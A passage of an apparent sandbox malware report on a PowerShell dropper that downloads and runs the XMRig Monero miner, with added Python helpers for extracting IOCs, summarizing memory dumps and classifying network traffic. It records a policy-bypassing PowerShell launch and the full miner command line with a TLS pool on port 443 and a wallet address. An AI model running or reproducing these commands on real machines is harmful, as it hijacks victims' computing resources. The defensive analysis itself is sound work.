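    worker: Optional[str] = None
    findings: List[str] = field(default_factory=list)


def split_cmdline(cmdline: str) -> List[str]:
    """Windows-style tokenizing: quoted runs stay whole, backslashes are literal."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_miner_cmdline(cmdline: str) -> MinerIOCs:
    tokens = split_cmdline(cmdline)
    iocs = MinerIOCs(image=tokens[0])
    opts = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--") and "=" in tok:             # --url=... form
            name, _, value = tok.partition("=")
            i += 1
        elif tok in OPTION_NAMES and i + 1 < len(tokens):    # -o value form
            name, value = tok, tokens[i + 1]
            i += 2
        else:
            i += 1
            continue
        if name in OPTION_NAMES:
            opts[OPTION_NAMES[name]] = value

    iocs.algo = opts.get("algo")
    m = POOL_URL_RE.match(opts.get("url", ""))
    if m and m.group("host"):
        iocs.scheme = m.group("scheme")
        iocs.pool_host = m.group("host")
        iocs.pool_port = int(m.group("port")) if m.group("port") else None
    user = opts.get("user")
    if user:
        if ":" in user:                     # COIN:address.worker (unMineable convention, assumption)
            iocs.coin, user = user.split(":", 1)
        iocs.wallet, _, worker = user.partition(".")
        iocs.worker = worker or None

    if iocs.scheme and iocs.scheme.startswith("stratum"):
        iocs.findings.append("stratum mining protocol")
    if iocs.pool_port in (80, 443):
        iocs.findings.append("pool on web port %d: port-based filtering will not see it" % iocs.pool_port)
    if (iocs.algo or "").split("/")[0] == "rx":
        iocs.findings.append("RandomX (Monero); huge-page setup is what requests SeLockMemoryPrivilege")
    if iocs.wallet and XMR_ADDRESS_RE.match(iocs.wallet):
        iocs.findings.append("well-formed Monero address")
    return iocs
```

The wallet and worker strings are the durable IOCs here: the pool host and the dropped file path can change between campaigns, but the operator has to keep the payout address, so it is the value worth pivoting on across other sandbox reports.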
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win7-20240508-en
Max time kernel
1561s
Max time network
1562s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
Network
Files
memory/2408-4-0x000007FEF5F2E000-0x000007FEF5F2F000-memory.dmp
memory/2408-5-0x000000001B770000-0x000000001BA52000-memory.dmp
memory/2408-6-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/2408-8-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2408-7-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2408-9-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
memory/2408-10-0x000007FEF5C70000-0x000007FEF660D000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:40
Platform
win11-20240426-en
Max time kernel
1800s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 matches of this signature in this run; the report records no description, indicator, process or target for any of them)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3352 wrote to memory of 3632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3352 wrote to memory of 3632 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 13.107.21.200:443 | tse1.mm.bing.net | tcp |
Files
memory/3352-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfpm2l34.31v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3352-6-0x00000201CB160000-0x00000201CB182000-memory.dmp
memory/3352-10-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-11-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-14-0x00000201CB340000-0x00000201CB352000-memory.dmp
memory/3352-15-0x00000201CB330000-0x00000201CB33A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3632-46-0x0000024752BF0000-0x0000024752C10000-memory.dmp
memory/3632-47-0x0000024752C50000-0x0000024752C70000-memory.dmp
memory/3632-48-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3352-49-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
memory/3632-51-0x0000024752C70000-0x0000024752C90000-memory.dmp
memory/3632-52-0x0000024752C90000-0x0000024752CB0000-memory.dmp
memory/3352-50-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3632-53-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-54-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-55-0x0000024752C70000-0x0000024752C90000-memory.dmp
memory/3632-56-0x0000024752C90000-0x0000024752CB0000-memory.dmp
memory/3632-57-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-58-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-59-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-60-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-61-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-62-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-63-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-64-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-65-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-66-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-67-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-68-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-69-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-70-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-71-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-72-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-73-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-74-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-75-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-76-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-77-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-78-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-79-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-80-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-81-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-82-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-83-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-84-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-85-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-86-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-87-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-88-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-89-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-90-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-91-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-92-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-93-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-94-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-95-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-96-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-97-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-98-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-99-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-100-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-101-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-102-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-103-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-104-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-105-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-106-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-107-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-108-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-109-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-110-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-111-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-112-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-113-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-114-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-115-0x00007FF763560000-0x00007FF764193000-memory.dmp
memory/3632-116-0x00007FF763560000-0x00007FF764193000-memory.dmp
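The Files section of each run is dominated by dozens of `memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp` entries. Parsed rather than skimmed, they say something useful: for every xmrig.exe PID one region of exactly 0xC33000 bytes is dumped over and over, at a different base in each run (0x00007FF763560000 here, 0x00007FF72E5E0000 in behavioral12, 0x00007FF7111E0000 in behavioral29). A region of constant size at an ASLR-relocated base is the same PE image each time, which agrees with xmrig.exe having the same SHA-256 in every run. The summarizer below is an added example written for this page, not code from the report or the sandbox; the names it works on are a transcribed subset of the entries above and from the other two Windows 10/11 runs.

```python
"""Summarize sandbox memory-dump names: which regions each PID had dumped,
how often, and which region size recurs across PIDs at different bases.

Added example for this report; not code from the report or the sandbox.
The names below are a subset transcribed from the Files sections of
behavioral24, behavioral12 and behavioral29 (same dump-name layout in all).
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

DUMP_NAME = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

DUMP_NAMES = [
    # behavioral24: powershell.exe (3352) and xmrig.exe (3632)
    "memory/3352-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp",
    "memory/3352-6-0x00000201CB160000-0x00000201CB182000-memory.dmp",
    "memory/3352-10-0x00007FFD97880000-0x00007FFD98342000-memory.dmp",
    "memory/3352-11-0x00007FFD97880000-0x00007FFD98342000-memory.dmp",
    "memory/3632-46-0x0000024752BF0000-0x0000024752C10000-memory.dmp",
    "memory/3632-48-0x00007FF763560000-0x00007FF764193000-memory.dmp",
    "memory/3632-53-0x00007FF763560000-0x00007FF764193000-memory.dmp",
    "memory/3632-54-0x00007FF763560000-0x00007FF764193000-memory.dmp",
    "memory/3632-57-0x00007FF763560000-0x00007FF764193000-memory.dmp",
    # behavioral12: xmrig.exe (4032)
    "memory/4032-46-0x0000016CF9AC0000-0x0000016CF9AE0000-memory.dmp",
    "memory/4032-51-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp",
    "memory/4032-52-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp",
    # behavioral29: xmrig.exe (2544)
    "memory/2544-93-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp",
    "memory/2544-95-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp",
]

Region = Tuple[int, int]


def parse_dump_name(name: str) -> Optional[dict]:
    """Return pid, dump index, start, end and size for a dump name, or None for other files."""
    m = DUMP_NAME.match(name)
    if not m:
        return None
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"pid": int(m["pid"]), "idx": int(m["idx"]), "start": start, "end": end, "size": end - start}


def regions_by_pid(names: List[str]) -> Dict[int, Dict[Region, int]]:
    """pid -> {(start, end): number of dumps taken of that region}."""
    out: Dict[int, Dict[Region, int]] = defaultdict(lambda: defaultdict(int))
    for name in names:
        d = parse_dump_name(name)
        if d:
            out[d["pid"]][(d["start"], d["end"])] += 1
    return {pid: dict(regs) for pid, regs in out.items()}


def shared_sizes(names: List[str], min_size: int = 0) -> Dict[int, List[int]]:
    """Region sizes seen in more than one PID, with those PIDs. Small heap
    blocks recur too, so filter with min_size to isolate the image-sized one."""
    pids_for_size: Dict[int, set] = defaultdict(set)
    for pid, regs in regions_by_pid(names).items():
        for start, end in regs:
            if end - start >= min_size:
                pids_for_size[end - start].add(pid)
    return {size: sorted(pids) for size, pids in pids_for_size.items() if len(pids) > 1}


def hottest_region(names: List[str], pid: int) -> Optional[Tuple[Region, int]]:
    """The region dumped most often for a PID; for the miner that is its image."""
    regs = regions_by_pid(names).get(pid)
    if not regs:
        return None
    region = max(regs, key=regs.get)
    return region, regs[region]
```

When pulling the dumps for offline work, one copy of the image region per PID is enough; the remaining dumps of the same range add nothing a static pass over the dropped xmrig.exe does not already give you.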
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1770s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 matches of this signature in this run; the report records no description, indicator, process or target for any of them)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3780 wrote to memory of 2544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3780 wrote to memory of 2544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
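The Network table above mixes three kinds of rows: the PowerShell stage's fetch from github.com and objects.githubusercontent.com (consistent with pulling the xmrig-6.21.3 release asset that then appears under Files), the TLS connection to the pool on 161.35.34.195:443, and the operating system's own DNS and `in-addr.arpa` reverse lookups for addresses it just connected to. The classifier below is an added example written for this page, not code from the report or the sandbox. It buckets the rows transcribed from this run and ties each PTR lookup back to the forward connection it belongs to, so the reverse-lookup names stop looking like three extra IOCs. The pool-suffix and artifact-host lists are the author's own short assumptions and should be extended from your own intel.

```python
"""Bucket a sandbox run's Network rows into pool traffic, payload download
and background noise, and link PTR lookups to the connections behind them.

Added example for this report; not code from the report or the sandbox.
Rows are transcribed from the behavioral29 Network table.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

Row = Tuple[str, str, str, str]   # country, destination, domain, proto

NETWORK_ROWS: List[Row] = [
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "8.8.8.8:53", "objects.githubusercontent.com", "udp"),
    ("US", "185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "215.156.26.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "133.108.199.185.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "rx.unmineable.com", "udp"),
    ("GB", "161.35.34.195:443", "rx.unmineable.com", "tcp"),
    ("US", "8.8.8.8:53", "195.34.35.161.in-addr.arpa", "udp"),
    ("NL", "52.142.223.178:80", "", "tcp"),     # no domain recorded in the report
]

POOL_SUFFIXES = ("unmineable.com",)                                  # assumption: extend from your intel
ARTIFACT_HOSTS = {"github.com", "objects.githubusercontent.com"}     # release-asset hosts (assumption)


def split_dest(dest: str) -> Tuple[str, int]:
    host, _, port = dest.rpartition(":")
    return host, int(port)


def classify_row(country: str, dest: str, domain: str, proto: str) -> str:
    _, port = split_dest(dest)
    if domain.endswith(".in-addr.arpa"):
        return "ptr_lookup"              # the OS naming addresses it already talked to
    if port == 53 and proto == "udp":
        return "dns_query"
    if any(domain == s or domain.endswith("." + s) for s in POOL_SUFFIXES):
        return "mining_pool"
    if domain in ARTIFACT_HOSTS:
        return "payload_download"
    return "unresolved" if not domain else "other"


def summarize(rows: List[Row]) -> Dict[str, List[Row]]:
    buckets: Dict[str, List[Row]] = defaultdict(list)
    for row in rows:
        buckets[classify_row(*row)].append(row)
    return dict(buckets)


def pool_iocs(rows: List[Row]) -> List[Tuple[str, str, int]]:
    """(domain, ip, port) of pool connections. This pool sits on TCP/443 under
    TLS, so neither a port rule nor a plain-text 'stratum' match fires; alert
    on the domain/SNI and the IP instead."""
    out = []
    for row in rows:
        if classify_row(*row) == "mining_pool":
            ip, port = split_dest(row[1])
            out.append((row[2], ip, port))
    return out


def ptr_target(domain: str) -> str:
    """'195.34.35.161.in-addr.arpa' -> '161.35.34.195'."""
    octets = domain[: -len(".in-addr.arpa")].split(".")
    return ".".join(reversed(octets))


def link_ptr_lookups(rows: List[Row]) -> Dict[str, str]:
    """Map each PTR-queried IP to the domain of the forward connection that
    caused the lookup (empty string when no such connection is in the table)."""
    forward = {split_dest(dest)[0]: domain for _, dest, domain, _ in rows
               if domain and not domain.endswith(".in-addr.arpa") and split_dest(dest)[1] != 53}
    return {ptr_target(d): forward.get(ptr_target(d), "")
            for _, _, d, _ in rows if d.endswith(".in-addr.arpa")}
```

The row with no recorded domain (52.142.223.178:80) is left in its own bucket on purpose: without a name or a matching forward lookup it cannot be attributed from this table alone and should be checked against the sandbox's clean-run baseline before it is treated as an indicator.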
Files
memory/3780-3-0x00007FF8922E3000-0x00007FF8922E4000-memory.dmp
memory/3780-5-0x0000017F63790000-0x0000017F637B2000-memory.dmp
memory/3780-7-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
memory/3780-10-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1kqnk5c.wet.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3780-9-0x0000017F7BE00000-0x0000017F7BE76000-memory.dmp
memory/3780-25-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
memory/3780-48-0x0000017F7BD80000-0x0000017F7BD92000-memory.dmp
memory/3780-61-0x0000017F7BC40000-0x0000017F7BC4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2544-90-0x0000019F141D0000-0x0000019F141F0000-memory.dmp
memory/3780-91-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
memory/3780-92-0x00007FF8922E3000-0x00007FF8922E4000-memory.dmp
memory/3780-94-0x00007FF8922E0000-0x00007FF892CCC000-memory.dmp
memory/2544-93-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-95-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-96-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-97-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-98-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-99-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
memory/2544-100-0x00007FF7111E0000-0x00007FF711E13000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:20
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4320 wrote to memory of 876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4320 wrote to memory of 876 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
